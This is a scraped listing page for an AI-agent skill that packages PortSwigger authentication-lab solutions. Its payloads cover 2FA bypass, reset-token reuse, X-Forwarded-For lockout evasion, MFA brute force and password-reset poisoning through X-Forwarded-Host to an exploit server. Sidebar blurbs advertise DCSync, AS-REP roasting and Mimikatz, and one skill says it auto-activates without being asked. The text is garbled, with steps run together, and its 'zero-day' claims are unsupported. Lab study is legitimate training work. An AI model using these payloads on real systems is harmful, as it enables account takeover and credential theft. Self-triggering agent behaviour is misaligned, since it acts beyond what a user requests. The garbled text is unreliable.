ワンクリックで
authentication-complete-deep-dive
Complete PortSwigger deep-dive with exact payloads for every lab variant including zero-day techniques
Codex または Claude でインストール この Prompt をコピーして Codex、Claude、または他のアシスタントに貼り付けると、Skill ページを確認してインストールできます。
メニュー
Complete PortSwigger deep-dive with exact payloads for every lab variant including zero-day techniques
Codex または Claude でインストール この Prompt をコピーして Codex、Claude、または他のアシスタントに貼り付けると、Skill ページを確認してインストールできます。
SOC 職業分類に基づく
Bug bounty findings secretary, tracker, and workspace initializer for the bb-huge portal. Use this skill for web security research, vulnerability hunting, and hunt workspace setup. Triggers on: "log finding", "save finding", "add to bb-huge", "record vulnerability", "update finding", "show findings", "bb-huge stats", "mark as confirmed", "mark as rewarded", "setup workspace", "pull evidence", "continue working on finding", "dump attachments", "list my skills", "what skills do I have", "/bb-huge init", "init hunt workspace", "new bug bounty program", "start hunting", "mobile bug bounty", "binary analysis", "source code review", "white-box audit", "h1-brain", "hack program", "hack()", "search disclosed", "fetch rewarded". Also auto-activates whenever a vulnerability is discovered during any recon, fuzzing, or manual testing session — do not wait to be asked.
Exploit pervasive logical flaws in Multi-Factor Authentication (MFA/2FA) implementations to bypass the secondary authentication challenge entirely. Techniques include response manipulation, referal spoofing, token reuse, and predictable backup codes.
Complete PortSwigger deep-dive with exact payloads for every lab variant including zero-day techniques
Execute AS-REP Roasting to extract and crack the NTLM hashes of Active Directory user accounts that have the "Do not require Kerberos preauthentication" flag explicitly enabled. This attack generates a recoverable Ticket Granting Ticket (TGT) without requiring the attacker to authenticate first.
Execute a DCSync attack mimicking the behavior of a legitimate Active Directory Domain Controller (DC). Leverage Directory Replication Service Remote Protocol (DRSR) permissions to silently request and extract the password hashes (NTLM/Kerberos) of any or all users in the domain without executing code on the target Domain Controller.
Execute a complete Active Directory penetration test from initial enumeration to domain dominance. Use this skill for AD security assessments including LDAP enumeration, Kerberos attacks (Kerberoasting, AS-REP roasting), BloodHound attack path analysis, credential dumping with Mimikatz, lateral movement via PsExec/WMI/DCOM, DCSync for NTDS extraction, and Golden/Silver ticket forging. Covers the full kill chain from domain user to domain admin.
| name | Authentication — Complete Deep Dive |
| description | Complete PortSwigger deep-dive with exact payloads for every lab variant including zero-day techniques |
| domain | cybersecurity |
| subdomain | bug-hunting |
| version | 1.0.0 |
| category | bug-hunting/deep-dive-labs |
| tags | ["portswigger","deep-dive","exploitation","zero-day","lab-solutions"] |
| mitre_attack | ["T1110"] |
| tools | ["burp-suite","curl","sqlmap","ffuf","python","hashcat","ysoserial"] |
| difficulty | advanced |
Deep-Dive Lab Playbook — Every PortSwigger lab variant with exact payloads, bypass techniques, and zero-day extensions. 🟢 Apprentice 🟡 Practitioner 🔴 Expert
Invalid username vs Incorrect password./login2 (2FA page) and navigate directly to /my-account.POST /forgot-password?temp-forgot-password-token=TOKEN HTTP/1.1
temp-forgot-password-token=TOKEN&username=carlos&new-password-1=hacked&new-password-2=hacked
username to victim. Token validation doesn't check user ownership.Invalid username or password vs Invalid username or password.X-Forwarded-For: 1.1.1.§1§ to bypass IP lock.POST /login2 HTTP/1.1
Cookie: verify=carlos
mfa-code=§1234§
verify cookie to victim, brute force 4-digit MFA code.username:MD5(password)). Decode, crack MD5 hash.POST /forgot-password HTTP/1.1
X-Forwarded-Host: EXPLOIT-SERVER
username=carlos
{"username":"carlos","password":["123456","password","qwerty",...]}
When standard technique fails:
| Concept | Description |
|---|---|
| PortSwigger Vectors | Standardized approaches to vulnerability classes. |
| Payload Encoding | Modifying payloads to bypass basic string matching WAFs. |
Vulnerability Deep-Dive Report
==============================
Target Vector: [Endpoint]
Bypass Technique: [Explanation of bypass]
Payload Used: [Payload]
Impact Explanation: [Impact]
For cross-cutting methodology applicable to all vulnerability classes, see:
_shared/references/elite-chaining-strategy.md— Exploit chaining methodology and high-payout chain patterns_shared/references/elite-report-writing.md— HackerOne-optimized report writing, CWE quick reference_shared/references/real-world-bounties.md— Verified disclosed bounties by vulnerability class